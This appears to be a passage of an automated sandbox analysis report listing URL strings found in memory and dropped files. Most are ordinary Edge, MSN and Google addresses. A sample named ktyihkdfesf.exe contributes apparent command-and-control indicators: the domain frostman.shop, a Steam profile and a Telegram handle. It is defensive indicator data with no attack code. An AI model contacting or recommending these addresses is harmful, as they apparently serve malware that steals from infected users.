                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                  Source: ktyihkdfesf.exe, 00000000.00000003.2152897226.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/0
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/N
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/U
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/Z
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/n
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/p
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/ta
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/v
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/xg
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/~
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shop;
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shopQQ1V3Oming
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shopTRIE
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://gaana.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: 0HDJEU.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.kugou.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.soundcloud.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.vk.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                  Source: Cookies.15.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.15.drString found in binary or memory: https://msn.comXIDv10
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.amazon.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.apple.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.yandex.com
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 000003.log3.14.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log9.14.dr, 000003.log0.14.drString found in binary or memory: https://ntp.msn.com/
                  Source: 000003.log9.14.drString found in binary or memory: https://ntp.msn.com/0
                  Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 000003.log9.14.dr, 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: Session_13379149893822046.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.14.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://open.spotify.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: chromecache_561.7.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.com/
                  Source: ktyihkdfesf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: ktyihkdfesf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/9dB1
                  Source: ktyihkdfesf.exeString found in binary or memory: https://t.me/k04ael
                  Source: ktyihkdfesf.exeString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://tidal.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://vibe.naver.com/today
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                  Source: ktyihkdfesf.exe, 00000000.00000003.2152974492.0000000000765000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmp, ktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.telegram.org/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.whatsapp.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.deezer.com/
                  Source: V37YCB.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: content_new.js.14.dr, content.js.14.drString found in binary or memory: https://www.google.com/chrome
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 6a82b066-0a0e-4bfa-8ca2-b2a13d05ddcf.tmp.15.dr, 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://www.googleapis.com
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.instagram.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.last.fm/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.messenger.com
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.office.com
